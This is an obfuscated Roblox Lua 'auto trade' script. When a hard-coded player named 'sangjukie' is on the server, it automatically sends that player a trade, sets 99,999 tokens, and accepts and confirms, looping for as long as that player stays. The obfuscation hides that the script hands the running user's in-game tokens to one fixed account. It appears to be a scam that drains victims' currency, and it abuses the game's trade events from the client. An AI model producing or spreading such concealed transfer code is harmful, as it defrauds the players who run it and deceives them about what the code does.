--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="sangjukie";local v1=29 + 1 ;local v2=1280 -(226 + 1044) ;local v3=43 -33 ;local v4=118 -(32 + 85) ;local v5=98000 + 1999 ;local v6=game:GetService("Players");local v7=game:GetService("ReplicatedStorage");local v8=v6.LocalPlayer;local v9=v8:WaitForChild("Backpack");local v10=v7:WaitForChild("GameEvents"):WaitForChild("TradeEvents");local v11=v10:WaitForChild("SendRequest");local v12=v10:WaitForChild("SetTokens");local v13=v10:WaitForChild("Accept");local v14=v10:WaitForChild("Confirm");local v15=false;local function v16(...) print("[AUTO TRADE]",...);end local function v17() return v6:FindFirstChild(v0);end local function v18() return v17()~=nil ;end local function v19() local v24=v8.Character or v8.CharacterAdded:Wait() ;local v25=v24:WaitForChild("Humanoid");for v32,v33 in ipairs(v9:GetChildren()) do if (v33:IsA("Tool") and v33.Name:match("^Trading Ticket")) then local v34=0 + 0 ;while true do if (v34==1) then return true;end if (v34==0) then v25:EquipTool(v33);v16("Equipped:",v33.Name);v34=958 -(892 + 65) ;end end end end warn("[AUTO TRADE] Trading Ticket tidak ditemukan");return false;end local function v20(v26) local v27=0 -0 ;while true do if (v27==(5 -2)) then if  not v15 then return;end v16("Confirming trade");v14:FireServer();break;end if (v27==(0 -0)) then if  not v19() then return;end v16("Sending trade request ->",v26.Name);v11:FireServer(v26);task.wait(v1);v27=351 -(87 + 263) ;end if (v27==(182 -(67 + 113))) then if  not v15 then return;end v16("Accepting trade");v13:FireServer();task.wait(v3);v27=3 + 0 ;end if (v27==(2 -1)) then if  not v15 then return;end v16("Setting tokens:",v5);v12:FireServer(v5);task.wait(v2);v27=2 + 0 ;end end end local function v21() local v28=0 -0 ;while true do if (v28==(953 -(802 + 150))) then v16("Trade loop stopped");break;end if (v28==(0 -0)) then while v15 do local v35=v17();if  not v35 then break;end v20(v35);for v36=1 -0 ,v4 do if  not v15 then break;end task.wait(1 + 0 );end end v15=false;v28=1;end end end local function v22() local v29=997 -(915 + 82) ;while true do if (v29==(2 -1)) then v16(v0,"detected -> START");task.spawn(v21);break;end if (v29==(0 + 0)) then if v15 then return;end v15=true;v29=1 -0 ;end end end local function v23() if  not v15 then return;end v15=false;v16(v0,"left server -> STOP");end if v18() then v22();end v6.PlayerAdded:Connect(function(v30) if (v30.Name==v0) then v22();end end);v6.PlayerRemoving:Connect(function(v31) if (v31.Name==v0) then v23();end end);
